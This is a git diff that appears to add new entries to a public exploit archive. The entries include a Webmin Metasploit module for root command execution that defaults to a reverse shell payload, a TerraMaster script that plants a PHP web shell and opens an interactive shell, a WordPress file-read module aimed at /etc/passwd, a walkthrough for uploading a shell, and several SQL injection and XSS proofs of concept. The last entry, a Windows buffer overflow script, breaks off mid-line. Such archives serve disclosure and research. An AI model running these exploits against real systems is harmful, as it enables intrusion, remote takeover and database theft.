diff --git a/exploits/linux/webapps/49318.rb b/exploits/linux/webapps/49318.rb
new file mode 100755
index 000000000..965213565
--- /dev/null
+++ b/exploits/linux/webapps/49318.rb
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
+ 'Description' => %q(
+ This module exploits an arbitrary command execution vulnerability in Webmin
+ 1.962 and lower versions. Any user authorized to the "Package Updates"
+ module can execute arbitrary commands with root privileges.
+ It emerged by circumventing the measure taken for CVE-2019-12840.
+ s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
+ Therefore, since the package name variable is placed directly in the system command,
+ we can manipulate it using some escape characters that HTTP supports.
+ For example, we can escape control by dropping the command line down one line.
+ We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
+ we must add double an ampersand(&&) to the end of the payload (%26%26)
+ ),
+ 'Author' => [
+ 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', 'CVE-2020-35606'],
+ ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
+ ],
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 512,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 10000,
+ 'SSL' => false,
+ 'PAYLOAD' => 'cmd/unix/reverse_perl'
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [['Webmin <= 1.962', {}]],
+ 'DisclosureDate' => '2020-12-21',
+ 'DefaultTarget' => 0)
+ )
+ register_options [
+ OptString.new('USERNAME', [true, 'Webmin Username']),
+ OptString.new('PASSWORD', [true, 'Webmin Password']),
+ OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
+ ]
+ end
+
+ def peer
+ "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+ end
+
+ def login
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+ 'cookie' => 'testing=1', # it must be used for "Error - No cookies"
+ 'vars_post' => {
+ 'page' => '',
+ 'user' => datastore['USERNAME'],
+ 'pass' => datastore['PASSWORD']
+ }
+ })
+
+ if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+ return $1
+ end
+
+ return nil unless res
+ ''
+ end
+
+ def check
+ cookie = login
+ return CheckCode::Detected if cookie == ''
+ return CheckCode::Unknown if cookie.nil?
+
+ vprint_status('Attempting to execute...')
+ # check version
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
+ 'cookie' => "sid=#{cookie}",
+ 'vars_get' => { "xnavigation" => "1" }
+ })
+
+ if res && res.code == 302 && res.body
+ version = res.body.split("Webmin 1.")[1]
+ return CheckCode::Detected if version.nil?
+ version = version.split(" ")[0]
+ if version <= "962"
+ # check package update priv
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, "package-updates/"),
+ 'cookie' => "sid=#{cookie}"
+ })
+
+ if res && res.code == 200 && res.body =~ /Software Package Update/
+ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+ return CheckCode::Vulnerable
+ end
+ end
+ end
+ print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
+ print_status("Please try with another user account!")
+ CheckCode::Safe
+ end
+
+ def exploit
+ cookie = login
+ if cookie == '' || cookie.nil?
+ fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+ end
+ print_good("Session cookie: #{cookie}")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+ 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+ 'cookie' => "sid=#{cookie}"
+ )
+ unless res && res.code == 200
+ fail_with(Failure::Unknown, 'Request failed')
+ end
+
+ print_status("Attempting to execute the payload...")
+ run_update(cookie)
+ end
+
+ def run_update(cookie)
+ @b64p = Rex::Text.encode_base64(payload.encoded)
+ perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+ payload = Rex::Text.uri_encode(perl_payload)
+
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'cookie' => "sid=#{cookie}",
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+ 'headers' =>
+ {
+ 'Referer' => "#{peer}/package-updates/?xnavigation=1"
+ },
+ # new vector // bypass to backslash %0A%7C{}%26%26
+ 'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
+ # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
+ })
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/webapps/49321.py b/exploits/linux/webapps/49321.py
new file mode 100755
index 000000000..b62e60274
--- /dev/null
+++ b/exploits/linux/webapps/49321.py
@@ -0,0 +1,66 @@
+# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
+# Date: 12/12/2020
+# Exploit Author: IHTeam
+# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+# Vendor Homepage: https://www.terra-master.com/
+# Version: <= 4.2.06
+# Tested on: 4.1.30, 4.2.06
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import time
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
+parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
+args = parser.parse_args()
+
+url = args.url
+headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
+epoch_time = int(time.time())
+shell_filename = "debug"+str(epoch_time)+".php"
+
+def check_endpoint(url, headers):
+ response = requests.get(url+'/version', headers=headers, verify=False)
+ if response.status_code == 200:
+ print("[+] TerraMaster TOS version: ", str(response.content))
+ else:
+ print("\n[-] TerraMaster TOS response code: ", response.status_code)
+ sys.exit()
+
+def upload_shell(url, headers, shell_filename):
+ payload = "http|echo \"\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
+ payload = urllib.parse.quote(payload, safe='')
+ print("[/] Uploading shell...")
+ response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
+ time.sleep(1)
+ response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
+ if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
+ print("[+] Upload succeeded")
+ else:
+ print("\n[-] Error uploading shell: ", response.content)
+ sys.exit()
+
+def interactive_shell(url, headers, shell_filename, cmd):
+ response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
+ print(str(response.text)+"\n")
+
+
+def delete_shell(url, headers, shell_filename):
+ delcmd = "rm /usr/www/"+shell_filename
+ response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
+ print("\n[+] Shell deleted")
+
+check_endpoint(url, headers)
+upload_shell(url, headers, shell_filename)
+try:
+ while True:
+ cmd = input("# ")
+ interactive_shell(url, headers, shell_filename, cmd)
+except:
+ delete_shell(url, headers, shell_filename)
\ No newline at end of file
diff --git a/exploits/php/webapps/49307.txt b/exploits/php/webapps/49307.txt
index 5c40e7e0c..05ded52b2 100644
--- a/exploits/php/webapps/49307.txt
+++ b/exploits/php/webapps/49307.txt
@@ -4,6 +4,7 @@
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
+# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================
diff --git a/exploits/php/webapps/49310.txt b/exploits/php/webapps/49310.txt
new file mode 100644
index 000000000..4166d900e
--- /dev/null
+++ b/exploits/php/webapps/49310.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Victor CMS 1.0 - File Upload To RCE
+# Date: 20.12.2020
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+
+# Tested on: Apache2/Linux
+
+Step1: register http://localhost/CMSsite-master/register.php
+step2: login as user
+step3: Go to Profile
+step4: upload imag as php file (upload shell.php)
+step5: update user
+step6: You will find your shell in img folder :/path/img/cmd.php
+
+http://localhost/CMSsite-master/img/cmd.php?cmd=id
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
\ No newline at end of file
diff --git a/exploits/php/webapps/49312.txt b/exploits/php/webapps/49312.txt
new file mode 100644
index 000000000..877268ee0
--- /dev/null
+++ b/exploits/php/webapps/49312.txt
@@ -0,0 +1,82 @@
+# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
+# Date: 12-21-2020
+# Exploit Author: Matthew Aberegg, Alex Prieto
+# Vendor Homepage: https://pandorafms.com/
+# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 750
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
+# Vulnerable Parameter : network_csv
+
+
+# POC
+
+POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
+Content-Length: 1597
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+Upgrade-Insecure-Requests: 1
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_manual_defined"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_select"
+
+300
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_text"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_units"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="taskname"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="id_recon_server"
+
+3
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv_enabled"
+
+on
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv"; filename="test.txt"
+Content-Type: text/plain
+
+' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network"
+
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="comment"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="submit"
+
+Next
+-----------------------------308827614039434535382911921119--
\ No newline at end of file
diff --git a/exploits/php/webapps/49314.txt b/exploits/php/webapps/49314.txt
new file mode 100644
index 000000000..277304140
--- /dev/null
+++ b/exploits/php/webapps/49314.txt
@@ -0,0 +1,110 @@
+# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
+# Date : 2020-12-21
+# Author : Musyoka Ian
+# Version : CSE Bookstore 1.0
+# Vendor Homepage: https://projectworlds.in/
+# Platform : PHP
+# Tested on : Debian
+
+CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
+
+Below is results returned by SQLMap
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
+
+
+POC 1
+
+REQUEST
+========
+GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+Host: 192.168.196.83
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
+Upgrade-Insecure-Requests: 1
+
+RESPONSE
+========
+
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:09:49 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 172
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
+
+POC 2
+Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
+
+REQUEST
+=======
+
+POST /ebook/cart.php HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
+
+
+bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
+
+RESPONSE
+=======
+get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
+
+POC 3.
+Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
+
+REQUEST
+=======
+GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/books.php
+Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:47:58 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 188
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
\ No newline at end of file
diff --git a/exploits/php/webapps/49315.txt b/exploits/php/webapps/49315.txt
new file mode 100644
index 000000000..8a0b431b1
--- /dev/null
+++ b/exploits/php/webapps/49315.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-22
+# Google Dork: N/A
+# Vendor Homepage: https://otsglobal.org/
+# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
+# Affected Version: 3.0
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Admin.
+
+Step 2. Select "Book" from menu and select "Categories" from sub menu and
+after that click on "Add Category".
+
+Step 3. Insert payload - ">![]()
in "Category Name"
+
+Step 4. Now Click on "Save" , Go to "Category" and See last , there you
+will get alert box.
\ No newline at end of file
diff --git a/exploits/php/webapps/49316.txt b/exploits/php/webapps/49316.txt
new file mode 100644
index 000000000..aecb5eb78
--- /dev/null
+++ b/exploits/php/webapps/49316.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-21
+# Google Dork: N/A
+# Vendor Homepage: https://www.ramomcoder.com/
+# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
+# Affected Version: 3.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Super Admin.
+
+Step 2. Select "Branch" from menu and after that click on "Create Branch".
+
+Step 3. Insert payload - ">![]()
in "Branch Name" ,
+"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
+
+Step 4. Now Click on "Save" and you will get a list of alert boxes.
\ No newline at end of file
diff --git a/exploits/php/webapps/49317.rb b/exploits/php/webapps/49317.rb
new file mode 100755
index 000000000..75153361d
--- /dev/null
+++ b/exploits/php/webapps/49317.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Report
+include Msf::Exploit::Remote::HTTP::Wordpress
+include Msf::Auxiliary::Scanner
+
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
+'Description' => %q{
+This module exploits an unauthenticated directory traversal vulnerability
+in WordPress plugin
+'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
+the web server privileges.
+},
+'References' =>
+[
+['CVE', '2019-6715'],
+['WPVDB', '9248'],
+['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
+['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
+],
+'Author' =>
+[
+'VinhJAXT', # Vulnerability discovery
+'Hoa Nguyen - SunCSR Team' # Metasploit module
+],
+'DisclosureDate' => '2014-09-20',
+'License' => MSF_LICENSE
+)
+)
+
+register_options(
+[
+OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
+]
+)
+end
+
+def check
+check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
+end
+
+def run_host(ip)
+traversal = '../' * datastore['DEPTH']
+filename = datastore['FILEPATH']
+filename = filename[1, filename.length] if filename =~ %r{^/}
+
+json_body = { 'Type' => "SubscriptionConfirmation",
+'Message' => '',
+'SubscribeURL' => "file:///#{traversal}#{filename}"
+}
+
+res = send_request_cgi({
+'method' => 'PUT',
+'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
+'ctype' => 'application/json',
+'data' => JSON.generate(json_body)
+})
+
+fail_with Failure::Unreachable, 'Connection failed' unless res
+fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
+fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+
+print_status('Downloading file...')
+print_line("\n#{res.body}\n")
+
+fname = datastore['FILEPATH']
+path = store_loot(
+'w3_total_cache.traversal',
+'text/plain',
+ip,
+res.body,
+fname
+)
+print_good("File saved in: #{path}")
+end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/49319.txt b/exploits/php/webapps/49319.txt
new file mode 100644
index 000000000..79534b2ad
--- /dev/null
+++ b/exploits/php/webapps/49319.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Vijay Sachdeva
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
+# Affected Version: Version 1
+# Tested on Kali Linux
+
+Step 1. Log in to the application with admin credentials.
+
+Step 2. Click on "Explore" and then select "Artworks".
+
+Step 3. Choose any item, the URL should be "
+
+http://localhost/art-bay/info_art.php?id=6
+
+Step 4. Run sqlmap on the URL where the "id" parameter is given
+
+
+sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
+
+---
+
+
+Parameter: id (GET)
+
+ Type: boolean-based blind
+
+ Title: AND boolean-based blind - WHERE or HAVING clause
+
+ Payload: id=8 AND 4531=4531
+
+
+ Type: time-based blind
+
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+ Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
+
+
+ Type: UNION query
+
+ Title: Generic UNION query (NULL) - 9 columns
+
+ Payload: id=8 UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
+-
+
+---
+
+[08:18:34] [INFO] the back-end DBMS is MySQL
+
+[08:18:34] [INFO] fetching banner
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+
+banner: '10.3.24-MariaDB-2'
+
+
+---
+
+
+Step 5. Sqlmap should inject the web-app successfully which leads to
+information disclosure.
\ No newline at end of file
diff --git a/exploits/php/webapps/49320.txt b/exploits/php/webapps/49320.txt
new file mode 100644
index 000000000..1e5bbafe3
--- /dev/null
+++ b/exploits/php/webapps/49320.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
+# Exploit Author: Vijay Sachdeva (pwnshell)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
+# Tested on Kali Linux
+
+Step 1: Log in to the application with admin credentials
+
+Step 2: Click on Questionnaires, then click "Action" for any Academic Year
+and then click manage.
+
+Step 3. Input "" in "Question" field of
+the Question form.
+
+Step 4. Click on "Save" when done and this will trigger the Stored XSS
+payloads. Whenever you click on Questionnaires, click action for any
+academic year, and then manage, your XSS Payloads will be triggered for
+that "Academic Year"
\ No newline at end of file
diff --git a/exploits/windows/local/49322.py b/exploits/windows/local/49322.py
new file mode 100755
index 000000000..a338228d0
--- /dev/null
+++ b/exploits/windows/local/49322.py
@@ -0,0 +1,78 @@
+# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
+# Date: 2020-12-22
+# Exploit Author: Florian Gassner
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
+# Version: 9.05
+# Tested on: Windows 10 x64
+
+# Computer -> From Text File -> Choose exploit.txt
+
+import struct
+
+"""
+Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
+"""
+
+OFFSET = 214
+
+"""
+badchars = '\x00\x09\x0a\x0d\x3a\x5c'
+"""
+
+"""
+Log data, item 23
+ Address=01015AF4
+ Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
+"""
+
+pop_pop_ret = struct.pack("